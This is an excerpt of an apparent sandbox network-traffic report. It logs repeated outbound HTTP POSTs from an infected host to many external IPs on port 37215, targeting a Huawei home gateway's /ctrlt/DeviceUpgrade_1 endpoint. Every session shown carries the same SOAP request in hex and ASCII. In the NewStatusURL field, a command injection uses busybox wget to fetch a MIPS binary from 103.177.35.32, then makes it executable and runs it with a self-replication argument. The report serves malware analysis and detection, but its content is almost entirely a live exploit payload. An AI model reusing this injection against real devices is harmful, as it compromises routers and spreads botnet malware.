                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1816192.168.2.2348164197.221.40.23637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586430073 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1817192.168.2.233533441.81.189.637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586445093 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1818192.168.2.2332830197.187.14.9337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586445093 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1819192.168.2.2337766197.107.176.8937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586771965 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1820192.168.2.2341470152.191.227.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586779118 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1821192.168.2.2357126197.122.207.11237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586888075 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1822192.168.2.2345324157.1.169.18837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586903095 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1823192.168.2.2349416197.240.59.17937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586914062 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1824192.168.2.233791041.248.147.2637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586915016 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1825192.168.2.233665841.233.11.10137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586920023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
